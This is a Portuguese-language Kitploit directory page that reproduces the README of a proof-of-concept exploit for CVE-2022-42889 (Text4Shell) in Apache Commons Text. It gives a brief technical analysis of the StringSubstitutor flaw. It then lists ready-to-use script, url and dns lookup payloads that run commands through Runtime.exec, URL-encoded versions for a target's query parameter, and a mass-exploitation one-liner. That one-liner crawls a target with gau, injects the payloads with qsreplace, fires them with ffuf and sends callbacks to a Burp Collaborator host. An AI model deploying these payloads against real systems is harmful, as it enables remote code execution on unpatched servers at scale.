Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-42889-text4shell — Exploit de prova de conceito para CVE-2022-42889 (Text4Shell) no Apache Commons Text, com scripts de exploração manual e em massa usando lookups de script, URL e DNS. | Kitploit
Ferramentas/GitHubGitHub/kljunowsky/cve-2022-42889-text4shell
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubkljunowsky/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

Exploit de prova de conceito para CVE-2022-42889 (Text4Shell) no Apache Commons Text, com scripts de exploração manual e em massa usando lookups de script, URL e DNS.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
57848há 2 anosRevisado pelo Kitploit
Compartilhar

CVE-2022-42889-text4shell 🔥🔥🔥

Apache commons text - CVE-2022-42889 Text4Shell prova de conceito de exploit.

Detalhes📃

CVE-2022-42889 afeta as versões 1.5 a 1.9 do Apache Commons Text. Foi corrigido a partir da versão 1.10 do Commons Text.

A vulnerabilidade foi comparada ao Log4Shell por ser uma vulnerabilidade em nível de biblioteca de código aberto que provavelmente impactará uma ampla variedade de aplicações de software que utilizam o objeto relevante. No entanto, a análise inicial indica que essa é uma comparação ruim. A natureza da vulnerabilidade significa que, ao contrário do Log4Shell, será raro que uma aplicação use o componente vulnerável do Commons Text para processar entradas não confiáveis e potencialmente maliciosas.

Análise técnica

A vulnerabilidade existe no objeto interpolador StringSubstitutor. Um interpolador é criado pelo método StringSubstitutor.createInterpolator() e permite pesquisas de strings conforme definido em StringLookupFactory. Isso pode ser usado passando uma string no formato ${prefixo:nome}, onde prefixo é a pesquisa mencionada. Usar as pesquisas "script", "dns" ou "url" permitiria que uma string manipulada executasse scripts arbitrários quando passada para o objeto interpolador.

Embora esse fragmento de código específico seja improvável de existir em aplicações de produção, a preocupação é que, em algumas aplicações, a variável pocstring possa ser controlada por um atacante. Nesse sentido, a vulnerabilidade ecoa o Log4Shell. No entanto, o interpolador StringSubstitutor é consideravelmente menos utilizado do que a substituição de strings vulnerável no Log4j, e a natureza de tal interpolador significa que obter entrada manipulada para o objeto vulnerável é menos provável do que meramente interagir com uma string manipulada como no Log4Shell.

Exploração👨‍💻

Manual🛠️

script:javascript

Substitua o valor do parâmetro pelo payload:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://seu-alvo.com/exploit?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

url

root@kitploit:~
${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://seu-alvo.com/exploit?search=%24%7Burl%3AUTF-8%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

dns

root@kitploit:~
${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://seu-alvo.com/exploit?search=%24%7Bdns%3Aaddress%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

Exploração em massa ⛓️

payloads.txt

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
for payload in $(cat payloads.txt|sed 's/ COLLABORATOR-HERE/SPACEid.burpcollaborator.com/g'); do echo TARGET.com | gau --blacklist ttf,woff,svg,png | qsreplace "$payload" | sed 's/SPACE/%20/g' | grep "java.lang.Runtime.getRuntime" >> payloads-final.txt;done && ffuf -w payloads-final.txt -u FUZZ

Boa caçada!💸

Requisitos🧰

ffuf Obrigado @joohoi!

qsreplace Obrigado @tomnomnom

gau Obrigado @lc

Contato📇

LinkedIn Twitter - Milan Jovic

LinkedIn - Milan Jovic

Baixar ferramenta